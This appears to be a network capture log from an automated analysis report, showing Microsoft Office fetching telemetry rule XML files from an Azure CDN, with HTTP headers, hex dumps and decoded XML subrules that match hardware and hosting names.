                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:12 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 432
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                        x-ms-request-id: 657660fb-a01e-00ab-52ac-439106000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063912Z-174f7845968n2hr8hC1EWR9cag00000013kg00000000fcft
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        85192.168.2.84989013.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:12 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                        x-ms-request-id: 8aad1780-e01e-0020-7ed6-43de90000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063912Z-174f7845968cpnpfhC1EWR3afc00000013mg00000000b4wm
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:12 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        86192.168.2.84989213.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:13 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:13 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                        x-ms-request-id: e8c8f6d8-301e-0052-3262-4365d6000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063913Z-174f7845968qj8jrhC1EWRh41s000000142g000000001yn7
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        87192.168.2.84989313.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                        x-ms-request-id: 97ca64ed-201e-000c-5e6e-4379c4000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063914Z-174f7845968psccphC1EWRuz9s0000001480000000009unb
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        88192.168.2.84989513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 405
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                        x-ms-request-id: 64c010c7-b01e-003e-2ea1-428e41000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063914Z-174f7845968zgtf6hC1EWRqd8s0000000wyg00000000a0tm
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:15 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        89192.168.2.84989613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                        x-ms-request-id: 4f55dbf3-401e-005b-2250-439c0c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063914Z-174f7845968frfdmhC1EWRxxbw000000140g00000000cpgn
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:15 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        90192.168.2.84989413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:14 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:14 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                        x-ms-request-id: 1cfa5ca7-601e-000d-64b2-422618000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063914Z-174f7845968j6t2phC1EWRcfe800000014ag000000000cw4
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        91192.168.2.84989713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:15 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:16 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:16 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 174
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                        x-ms-request-id: 357a15c2-f01e-001f-47c7-435dc8000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063916Z-174f7845968n2hr8hC1EWR9cag00000013t0000000001ukt
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:16 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        92192.168.2.84989813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:16 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:16 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1952
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                        x-ms-request-id: ba49513a-b01e-0098-68e4-41cead000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063916Z-174f78459684bddphC1EWRbht400000013v0000000003fb5
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-02 06:39:17 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        93192.168.2.84990113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-02 06:39:16 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-02 06:39:17 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Mon, 02 Dec 2024 06:39:17 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                        x-ms-request-id: 205353cd-201e-006e-0bb2-42bbe3000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241202T063917Z-174f7845968nxc96hC1EWRspw800000013qg00000000cncx
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
